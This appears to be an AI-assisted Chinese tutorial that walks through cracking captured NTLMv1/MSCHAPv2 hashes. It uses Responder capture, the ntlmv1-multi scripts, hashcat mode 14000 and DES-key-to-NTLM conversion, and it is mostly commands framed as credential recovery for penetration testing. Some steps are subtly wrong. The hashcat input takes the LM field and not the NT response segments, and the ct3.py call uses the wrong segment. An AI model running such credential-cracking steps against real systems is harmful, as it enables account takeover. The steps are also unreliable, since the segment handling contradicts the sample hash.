ntlmv1-multi实战案例:破解MSCHAPv2哈希的完整步骤
ntlmv1-multi实战案例:破解MSCHAPv2哈希的完整步骤
【免费下载链接】ntlmv1-multiNTLMv1 Multitool项目地址: https://gitcode.com/gh_mirrors/nt/ntlmv1-multi
ntlmv1-multi是一款功能强大的NTLMv1 Multitool,专为破解MSCHAPv2哈希设计,能够帮助安全从业者快速恢复密码哈希,提升渗透测试效率。本文将通过实际案例,详细介绍使用ntlmv1-multi破解MSCHAPv2哈希的完整流程,从环境配置到最终获取结果,让新手也能轻松掌握这一实用工具。
准备工作:工具安装与环境配置 🛠️
1. 克隆项目仓库
首先需要将ntlmv1-multi项目克隆到本地,执行以下命令:
git clone https://gitcode.com/gh_mirrors/nt/ntlmv1-multi cd ntlmv1-multi2. 安装依赖
项目基于Python开发,需要安装相关依赖包。通过项目根目录下的pyproject.toml和uv.lock文件,可以快速安装所需依赖:
pip install -r requirements.txt3. 配置NTLMv1相关设置
在Windows系统中,NTLMv1的认证设置对哈希破解至关重要。通过修改注册表中的LmCompatibilityLevel值,可以控制客户端和服务器的NTLM认证行为。
注册表位置:HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel
实战步骤:破解MSCHAPv2哈希的详细流程 🔍
步骤1:获取NTLMv1哈希
通过Responder等工具捕获NTLMv1哈希,格式如下:
SERVER1$::MOG:7EF3F506F5EA510E00000000000000000000000000000000:1217169BD7BE0270A033899BD440016D3E6DACAF5894D504:ff81dfd6b12c269d步骤2:使用ntlmv1.py解析哈希
运行项目根目录下的ntlmv1.py脚本,解析哈希并提取关键信息(CT1、CT2、CT3、Challenge等):
python ntlmv1.py --ntlmv1 "SERVER1$::MOG:7EF3F506F5EA510E00000000000000000000000000000000:1217169BD7BE0270A033899BD440016D3E6DACAF5894D504:ff81dfd6b12c269d"解析后将输出:
- Hostname:目标主机名
- Username:用户名
- Challenge:挑战值
- LM Response和NT Response:响应哈希
- CT1、CT2、CT3:哈希分段
步骤3:使用ct3.py恢复PT3
CT3是NT响应中的关键分段,通过ct3.py工具可恢复PT3(NTLM哈希的最后4个字符):
python ct3.py 1217169BD7BE0270 ff81dfd6b12c269d输出结果示例:
Recovered key: a1b2步骤4:使用Hashcat破解CT1和CT2
将CT1和CT2与Challenge组合,生成Hashcat可识别的格式:
echo "7EF3F506F5EA510E:ff81dfd6b12c269d" >> 14000.hash echo "0000000000000000:ff81dfd6b12c269d" >> 14000.hash使用Hashcat破解(需指定模式14000和DES字符集):
hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1步骤5:合并结果获取完整NTLM哈希
将Hashcat破解得到的DES密钥通过deskey_to_ntlm.pl转换为NTLM哈希,再与PT3组合,得到完整的NTLM哈希:
perl deskey_to_ntlm.pl <hashcat_output>常见问题与解决方案 ❓
问题1:哈希解析失败
原因:哈希格式不正确或包含ESS(扩展会话安全)字段。
解决:使用--disable-ess参数重新捕获哈希,或通过ntlmv1.py的ESS处理逻辑自动适配。
问题2:CT3恢复超时
原因:DES密钥空间较大,暴力破解耗时。
解决:优化ct3.py中的循环逻辑(如第37行的16位密钥空间遍历),或使用GPU加速工具。
问题3:Hashcat破解无结果
原因:字符集不完整或模式错误。
解决:确保使用DES_full.charset字符集,并验证哈希模式为14000(NTLMv1)。
总结
通过ntlmv1-multi工具,我们可以高效地完成MSCHAPv2哈希的破解流程。从哈希解析到密钥恢复,再到最终合并结果,每个步骤都有明确的工具支持。项目中的ntlmv1.py和ct3.py是核心脚本,结合Hashcat等工具,能够快速实现密码哈希的恢复。掌握这一流程,将极大提升安全测试中凭证获取的效率,为后续渗透测试奠定基础。
提示:实际使用中需遵守法律法规,仅在授权环境下进行测试。项目相关工具和文档可在本地仓库中查阅,如
ntlmv1.py、ct3.py等核心文件。
【免费下载链接】ntlmv1-multiNTLMv1 Multitool项目地址: https://gitcode.com/gh_mirrors/nt/ntlmv1-multi
创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
